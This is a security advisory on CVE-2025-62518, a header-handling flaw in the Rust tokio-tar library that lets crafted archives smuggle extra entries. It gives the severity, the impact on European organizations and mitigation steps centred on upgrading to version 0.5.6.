CVE-2025-62518 is a type confusion vulnerability categorized under CWE-843 found in the astral-sh tokio-tar library, a Rust async tar archive processing library. The flaw exists in versions prior to 0.5.6 due to inconsistent handling of PAX-extended headers versus ustar headers during tar archive parsing. Specifically, when a tar archive contains PAX headers that override file sizes, the parser incorrectly advances the stream position based on the ustar header size field, which is often zero, rather than the actual size specified in the PAX header. This causes the parser to misinterpret subsequent file content as legitimate tar headers, enabling an attacker to smuggle additional archive entries into the processed archive. This can lead to unauthorized file extraction or overwriting, potentially exposing sensitive data or corrupting files. The vulnerability requires no privileges but does require user interaction to process a maliciously crafted archive. The CVSS v3.1 score is 8.1 (high), reflecting the network attack vector, low attack complexity, no privileges required, but user interaction needed, and high impact on confidentiality and integrity with no impact on availability. The vulnerability was publicly disclosed on October 21, 2025, and has been patched in version 0.5.6 of tokio-tar. No known exploits are currently in the wild, and no workarounds exist outside of upgrading. This vulnerability is particularly relevant for software projects and organizations that use tokio-tar for asynchronous tar archive processing in Rust, especially in automated pipelines or supply chain contexts where malicious archives might be introduced.

For European organizations, the impact of CVE-2025-62518 can be significant, especially those relying on Rust-based tooling or infrastructure that incorporates the astral-sh tokio-tar library for asynchronous tar archive processing. The vulnerability allows attackers to smuggle additional files into tar archives, potentially leading to unauthorized disclosure of sensitive information or integrity violations through overwriting or injecting malicious files. This can compromise software supply chains, automated deployment pipelines, or any system that processes tar archives from untrusted sources. Given the high confidentiality and integrity impact, organizations handling sensitive data or critical infrastructure could face data breaches or system compromise. Although availability is not directly affected, the indirect consequences of data corruption or unauthorized access could disrupt business operations. The requirement for user interaction limits automated exploitation but does not eliminate risk in environments where users or automated systems process untrusted archives. The lack of workarounds means timely patching is essential to mitigate risk. Compliance with European data protection regulations such as GDPR could also be impacted if sensitive data is exposed due to this vulnerability.

To mitigate CVE-2025-62518, European organizations should immediately upgrade all instances of the astral-sh tokio-tar library to version 0.5.6 or later, where the vulnerability is patched. Audit all Rust projects and dependencies to identify usage of tokio-tar and ensure they are updated accordingly. Implement strict validation and sanitization of tar archives before processing, especially those originating from untrusted or external sources. Where possible, isolate archive processing in sandboxed or containerized environments to limit potential damage from malicious archives. Incorporate monitoring and alerting for unusual file extraction or modification activities related to tar archives. Educate developers and DevOps teams about the risks of processing untrusted archives and enforce policies to avoid manual processing of suspicious files. For supply chain security, verify the integrity and provenance of tar archives used in automated pipelines. Since no workarounds exist, patching remains the primary defense. Additionally, consider employing runtime application self-protection (RASP) or enhanced logging to detect exploitation attempts.